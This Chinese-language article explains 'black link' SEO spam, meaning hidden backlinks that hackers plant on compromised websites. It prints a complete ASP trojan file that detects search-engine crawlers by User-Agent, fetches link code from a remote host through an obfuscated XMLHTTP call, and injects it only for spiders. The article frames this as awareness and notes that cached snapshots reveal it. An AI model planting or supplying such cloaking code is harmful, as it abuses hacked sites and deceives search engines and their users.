Tc711Com提示:隐藏在网站中的杀手 浅谈黑链的手段 |
黑链是SEO手法中相当普遍的一种手段,笼统地说,它就是指一些人用非正常的手段获取的其它网站的反向链接,最常见的黑链就是通过各种网站程序漏洞获取搜索引擎权重或者PR较高的网站的WEBSHELL,进而在被黑网站上链接自己的网站。
黑客们做黑链的方式可能多种多样,但手段其实只有两种,一种是直接在目标网站上直接加上特定的链接代码,另外一种只针对搜索引擎的访问来做,让搜索引擎误认为目标站上存在着这样的链接。下面对这两种方法做一个详细的解释。
1.直接在目标页面上加代码:这应该是最普通的一种手段,也是很容易发现的手段。以前的黑链大部分都是采用这种手段来进行。首先需要入侵目标站的FTP,然后针对网站所用的程序,在模板或者其他的页面加上“隐形”的链接。这种手段隐蔽性比较差,如果目标站的管理员懂得一定的SEO知识的话,很容易就会被发现。于是,更多的黑客开始使用第二个手段。
2.通过一段判定的代码,判定来访者的名称和IP地址,如果来访者是蜘蛛,则将另外一段包涵链接的代码加入到目标页面中。下面以一个ASP的例子进行说明:
黑客侵入到目标站的FTP,在程序里留下2个木马文件,一个文件名为int.asp,所包含的代码为:
<%
On Error Resume Next user_agent=Request.ServerVariables(“HTTP_USER_AGENT”) httpuser=LCase
(request.servervariables(“http_user_agent”))
if instr(httpuser,”baidu”)>0 or instr(httpuser,”google”)>0 or instr(httpuser,”sogou”)>0 or instr(httpuser,”soso”)>0
then Set ObjXMLHTTP=Server.createobject(“MSX”+”ML2.s”+”erv”+”erXML”+”HTTP”) ObjXMLHTTP.Open “GET”,”http://domain/a/193.txt”,False ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject(“Adodb.Stream”) objStream.Type = 1
objStream.Mode =3 objStream.Open objStream.Write
GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = “gb2312″ GetHtml = objStream.ReadText objStream.Close key1=lcase(GetHtml) key1=Replace(key1&”",”-istxt-”,”")
response.Write key1 end if
%>
通过IP和访问名称判定来访者是否为蜘蛛,将另外一个文件名字叫“193.txt”(主要是链接的代码)的文件写入到目标页面中。这样蜘蛛抓取的代码跟我们看到的代码是不一样的。不管是检查网页源文件还是用站长工具,都没办法发现黑链的存在。只有一种办法,那就是检查快照存档的代码页面,才能够看出问题来。
第二种办法虽然复杂了点,但是不容易被发现,就算用这种方法让你的网站被K,你可能一时半刻都无法发现问题。实在属于杀手级别的黑链手段。
更多的[分享]浅谈网站黑链的手段请到论坛查看: http://BBS.TC711.COM
【 双击滚屏 】 【 评论 】 【 收藏 】 【 打印 】 【 关闭 】
来源:
互联网
日期:2012-8-3